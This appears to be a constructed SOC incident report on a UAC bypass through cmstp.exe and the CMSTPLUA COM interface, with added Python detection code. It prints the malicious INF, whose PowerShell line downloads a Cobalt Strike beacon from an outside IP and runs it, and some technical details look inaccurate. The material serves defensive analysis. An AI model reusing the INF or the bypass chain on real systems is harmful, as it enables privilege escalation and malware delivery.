T1548 – Abuse Elevation Control Mechanism (Microsoft Defender Detection)

Microsoft Defender Alert Details
Alert ID: MD-UAC-BYPASS-1548-7842
Alert Time: 2024-02-17 14:15:33 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “UAC Bypass Attempt Detected”
MITRE ATT&CK: T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control

Alert Details:

Detection: Process attempted to bypass UAC using CMSTPLUA COM interface

Host: FIN-WS-112 (Finance Department)

User: jdoe (Jane Doe – Standard User)

Time: 14:10 EST

Process Tree:

– explorer.exe (PID: 2341 – user context)
  – rundll32.exe (PID: 3789)
    Command: rundll32.exe C:\Windows\System32\cmstplua.dll,Launch
    – cmstp.exe (PID: 3792) – spawned by COM
      Command: cmstp.exe /s C:\Users\jdoe\AppData\Local\Temp\install.inf

File Created:

– C:\Users\jdoe\AppData\Local\Temp\install.inf

– Content: Malicious INF file designed to execute elevated command

– SHA256: a1b2c3d4e5f6…

Elevated Action:

– cmstp.exe (running as medium integrity) triggered UAC bypass

– Result: Elevated command prompt launched as HIGH integrity

– Command: whoami /groups (confirmed high integrity)

Detection Logic:

– The CMSTPLUA COM interface is a known UAC bypass technique

– User jdoe is a standard user and should not obtain a high-integrity token

– INF file contains suspicious commands

– Pattern matches the “UACME” toolkit
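As an added example (not part of the original alert and not Defender's own logic), the detection logic above expressed over constructed process-creation records shaped like the alert's process tree; the PowerShell child PID 3801, the integrity levels and the standard-user list are assumptions:

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (the fields a Sysmon or MDE event carries)."""
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str
    integrity: str  # "Medium" or "High"

# Constructed telemetry modelled on the alert's process tree; PID 3801 is an assumed child.
EVENTS = [
    ProcEvent(2341, 1, r"C:\Windows\explorer.exe", "explorer.exe", "jdoe", "Medium"),
    ProcEvent(3789, 2341, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\cmstplua.dll,Launch", "jdoe", "Medium"),
    ProcEvent(3792, 3789, r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe /s C:\Users\jdoe\AppData\Local\Temp\install.inf", "jdoe", "Medium"),
    ProcEvent(3801, 3792, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -WindowStyle Hidden -Command Invoke-WebRequest ...", "jdoe", "High"),
]
STANDARD_USERS = {"jdoe"}  # accounts that should never reach high integrity
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)

def find_cmstp_bypass(events, standard_users):
    """Flag cmstp.exe runs matching the alert's detection logic: silent (/s) install of an
    INF from a user-writable path, launched through the CMSTPLUA COM interface or followed
    by a high-integrity child owned by a standard user."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if not e.image.lower().endswith("\\cmstp.exe"):
            continue
        silent_temp_inf = "/s" in e.cmdline.lower() and bool(USER_WRITABLE.search(e.cmdline))
        parent = by_pid.get(e.ppid)
        via_cmstplua = parent is not None and "cmstplua.dll" in parent.cmdline.lower()
        elevated = [c.pid for c in events
                    if c.ppid == e.pid and c.integrity == "High" and c.user in standard_users]
        if silent_temp_inf and (via_cmstplua or elevated):
            hits.append({"pid": e.pid, "via_cmstplua": via_cmstplua, "elevated_children": elevated})
    return hits

if __name__ == "__main__":
    for hit in find_cmstp_bypass(EVENTS, STANDARD_USERS):
        print("UAC bypass via CMSTP:", hit)
```

A cmstp.exe run from a non-user-writable path with no COM parent and no elevated child produces no hit, which keeps legitimate Connection Manager profile installs out of the alert.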

Additional Context:

– User clicked “Update Now” in fake Adobe Flash pop-up

– INF file downloaded by previous script

SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed UAC bypass attempt using CMSTPLUA |
| 2. INF Analysis | Analyze install.inf | Manual review, Sandbox | INF file executes PowerShell to download additional payload |
| 3. Process Investigation | Check elevated processes | Defender, CrowdStrike | No persistent elevated processes found |
| 4. Immediate Action | Kill elevated processes | Defender | All processes terminated |
| 5. File Deletion | Delete malicious INF | PowerShell | install.inf removed |
| 6. User Interview | Contact user | Teams, Phone | User clicked fake Adobe Flash update |

Jira Incident Report
Ticket: SOC-2024-087
Summary: T1548 – UAC Bypass Attempt via CMSTPLUA Technique
Status: RESOLVED
Resolution: MALICIOUS – UAC Bypass Blocked
Priority: P2 – MEDIUM
Labels: T1548, uac-bypass, elevation-control, defender, phishing
Components: Endpoint-Security, Privilege-Escalation

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: Microsoft Defender for Endpoint.
Alert: “UAC Bypass Attempt Detected”.
Host: FIN-WS-112 (Finance Department, user jdoe).
Time: 2024-02-17 14:15 EST.
Technique: MITRE ATT&CK T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control.

2. Technical Analysis:

Attack Chain:

14:00 – User visits news site, sees “Adobe Flash Update” pop-up

14:01 – User clicks “Update Now”

14:02 – Downloader script runs, saves install.inf to Temp folder

14:03 – Script triggers UAC bypass via CMSTPLUA COM interface

14:04 – CMSTP launches with install.inf

14:05 – INF file executes PowerShell as high integrity

14:06 – PowerShell downloads additional payload (blocked)

14:10 – Defender detects UAC bypass

UAC Bypass Technique:

Method: CMSTPLUA COM object (Microsoft Connection Manager)
Execution: rundll32 launches CMSTP via COM
Result: Medium integrity process spawns high integrity process
Tool: UACME technique #23

INF File Analysis:

File: install.inf (SHA256: a1b2c3d4…)
Content:

[Version]
Signature=$CHICAGO$

[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe"

Effect: When processed by CMSTP, runs PowerShell with high integrity

Payload:

beacon.exe: Cobalt Strike beacon (blocked by firewall)
No execution occurred (network blocked)
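An added example, not from the original report, that parses a constructed copy of the install.inf shown above and pulls out the commands CMSTP would run from [DefaultInstall]; the section-reference form it also accepts follows the documented INF layout and is an assumption about other samples, and the indicator list is a constructed triage heuristic:

```python
# Markers that, in a setup command, match what this incident's INF did.
DOWNLOAD_EXEC = ("powershell", "invoke-webrequest", "downloadstring", "%temp%", "http")

# Constructed copy of the install.inf shown above (IP kept defanged, as in the report).
INF_TEXT = r"""[Version]
Signature=$CHICAGO$
[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe"
"""

def parse_inf(text):
    """Minimal INF reader: section name (lower-cased) -> list of its non-comment lines."""
    sections, cur = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):  # ';' at line start opens an INF comment
            continue
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1].lower()
            sections.setdefault(cur, [])
        elif cur is not None:
            sections[cur].append(line)
    return sections

def cmstp_setup_commands(sections):
    """Commands CMSTP runs for [DefaultInstall]: RunPreSetupCommands / RunPostSetupCommands
    given inline (as in this sample) or naming a section that lists one command per line."""
    cmds = []
    for line in sections.get("defaultinstall", []):
        key, _, val = line.partition("=")
        if key.strip().lower() in ("runpresetupcommands", "runpostsetupcommands"):
            cmds.extend(sections.get(val.strip().lower(), [val.strip()]))
    return cmds

def triage_inf(text):
    """Return (commands, indicators). Any setup command in an INF dropped in a user's Temp
    folder deserves review; the indicators show which download/exec markers it carries."""
    cmds = cmstp_setup_commands(parse_inf(text))
    indicators = sorted({t for c in cmds for t in DOWNLOAD_EXEC if t in c.lower()})
    return cmds, indicators

if __name__ == "__main__":
    print(triage_inf(INF_TEXT))
```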

3. Investigation Findings:

Timeline:

14:00 – User clicks fake update

14:01-14:05 – UAC bypass chain

14:05 – PowerShell attempts download (blocked)

14:10 – Defender alert

14:12 – SOC investigates

14:15 – Processes terminated, INF deleted

Indicators of Compromise (IoCs):

Files:

– install.inf (SHA256: a1b2c3d4…)

Network:

– http://185.143.221[.]89/beacon.exe

Technique:

– CMSTPLUA COM object abuse

4. Containment Actions:

Immediate Actions:

Terminated all elevated processes.
Deleted install.inf.
Blocked download URL at firewall.

Host Remediation:

Full scan (no other malware).
No reimage needed.

User Remediation:

User educated on fake updates.
Reported malicious site.

5. Root Cause Analysis:

Primary Cause: User clicked fake Adobe Flash update pop-up.
Contributing Factors:
UAC bypass technique exploited legitimate Windows feature.
User running as standard user (but bypass still worked).
No ASR rule blocking CMSTP execution.

6. Business Impact:

Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (payload download blocked).

7. Remediation & Prevention:

Completed Actions:

UAC bypass chain stopped.
Malicious files removed.
User educated.

Technical Controls Enhanced:

Enabled ASR rule “Block abuse of exploited vulnerable signed drivers”.
Blocked CMSTP execution via AppLocker for standard users.
Enhanced monitoring for UAC bypass techniques.

8. Conclusion:

A user clicked a fake Adobe Flash update that triggered a UAC bypass using the CMSTPLUA technique. The bypass attempted to download a Cobalt Strike beacon with elevated privileges. Defender detected the technique, and the download was blocked. No compromise occurred.

Closure Rationale: UAC bypass stopped; user educated; controls enhanced.

Analyst: [Walter White], SOC Analyst
Date: 2024-02-17 15:00 EST
